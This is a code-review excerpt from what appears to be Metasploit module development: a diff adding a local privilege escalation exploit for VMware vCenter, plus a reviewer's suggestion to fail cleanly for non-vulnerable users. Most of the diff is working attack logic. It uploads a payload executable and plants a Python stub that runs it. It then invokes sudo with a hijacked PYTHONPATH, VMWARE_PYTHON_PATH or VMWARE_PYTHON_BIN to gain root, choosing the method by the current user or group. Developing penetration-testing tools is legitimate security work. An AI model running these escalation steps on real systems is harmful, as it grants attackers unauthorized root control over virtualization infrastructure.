modules/exploits/linux/local/vcenter_sudo_lpe.rb

```diff
@@ -0,0 +1,170 @@
+
+    return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+
+    # Upload payload stub
+    payload_stub = "#{base_dir}/spwd.py"
+    write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
+    register_files_for_cleanup(payload_stub)
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit_pod_user
+    # for this exploit we abuse install-parametery as it does a 'from appliance...', so if we
+    # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution
+    vprint_status('Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.')
+    mkdir("#{base_dir}/appliance")
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+
+    # Upload payload stub
+    payload_stub = "#{base_dir}/appliance/__init__.py"
+    write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
+    register_files_for_cleanup(payload_stub)
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit_admin_group
+    # for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN
+    # so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution
+    vprint_status('Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.')
+    mkdir("#{base_dir}/appliance")
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_files_for_cleanup(payload_path)
+
+    # Upload payload stub
+    payload_stub = "#{base_dir}/appliance/__init__.py"
+    write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()")
+    register_files_for_cleanup(payload_stub)
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "sudo VMWARE_PYTHON_BIN=#{payload_path} /bin/dcli", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+  end
+
+  def exploit
+    @user = cmd_exec('whoami').chomp if @user.nil?
+    @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil?
+    if @user == 'pod'
+      exploit_pod_user
+    elsif @groups.include? 'operator'
+      exploit_operator_group
+    elsif @groups.include? 'admin'
+      exploit_admin_group
```

Comment:
Similar messaging to the check method here would be good incase force exploit is enabled with a non-vulnerable user configuration. 
```suggestion
    elsif @groups.include? 'admin'
      exploit_admin_group
    else 
      fail_with(Failure::BadConfig, "User not vulnerable or not in correct group. (#{@user}:#{@groups})")
```